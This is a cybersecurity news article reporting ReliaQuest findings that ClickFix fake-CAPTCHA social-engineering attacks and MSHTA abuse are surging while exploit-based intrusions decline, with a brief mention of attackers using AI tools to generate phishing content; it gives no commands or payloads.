Phishing, Malware

ClickFix attacks surge as exploits see drop in popularity

reCAPTCHA on windows screen. Checkmark to prove that you are not robot.

(Adobe Stock)

Threat actors have been increasingly relying on social-engineering tactics such as ClickFix scams to lure victims into infecting their systems with malware.

Researchers with security provider ReliaQuest said that social-engineering attacks, most notably ClickFix attacks in which victims are tricked into running malicious scripts under the guise of CAPTCHA codes, now make up the majority of observed attack scams, along with techniques such as phishing emails.

“One standout trend this quarter is the widespread use of ClickFix — a social engineering technique that tricks users into pasting malicious commands into tools like PowerShell or the Windows Run prompt,” the ReliaQuest team explained.

“Disguised as a ‘solution’ to issues like fake CAPTCHAs or Windows updates, ClickFix preys on user trust and curiosity, enabling attackers to deliver malware and gain initial access with alarming ease.”

Other sources have noted a similar rise in the use of ClickFix techniques for targeted malware operations. Both private- and state-backed hacking outfits have turned to the technique as a means for evading detection by security tools and luring unwary users into compromising their own systems with malware.

According to the ReliaQuest research, threat actors have taken a particular liking to HTML applications between March through May. MSHTA, the Windows executable charged with running HTML apps, has exploded in popularity as an attack vector, growing from 3.1% to 33% of all defense evasion attempts in the span of a single year.

This is believed to be a biproduct of the growth in ClickFix attacks, as threat actors will use MSHTA code as the initial means of the malware attack chain and unsuspecting targets will be more likely to run web application code and commands.

“Threat actors take advantage of this legitimate tool by convincing users to copy and paste malicious commands into a terminal and pressing enter,” ReliaQuest said.

“MSHTA allows attackers to bypass traditional security controls designed to detect file-based delivery methods, such as phishing.”

The increasing popularity came at the expense of vulnerability exploit scripts. The researchers reckon that the ease of use associated with running ClickFix attacks, particularly the use of automated AI tools to generate the phishing email and attack code, has appealed to cybercriminals seeking an easier way to lure victims and turn mass email runs into active infections.

“External remote resources dropped from third to fourth place as attackers increasingly exploit user mistakes rather than technical vulnerabilities,” the ReliaQuest team explained.

“This shift is likely driven by the simplicity, success rate, and universal applicability of social engineering campaigns like ClickFix.”

Shaun Nichols

A career IT news journalist, Shaun has spent 17 years covering the industry with a specialty in the cybersecurity field.

Related

Okta warns of AI-powered phishing infrastructure

Okta has identified a significant shift in phishing tactics, with cybercriminals now using generative AI platforms like v0.dev by Vercel to create convincing phishing websites that mimic trusted brands such as Microsoft 365, Okta, and major cryptocurrency firms, Security Brief Asia reports.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

Related Terms

Adware

You can skip this ad in 5 seconds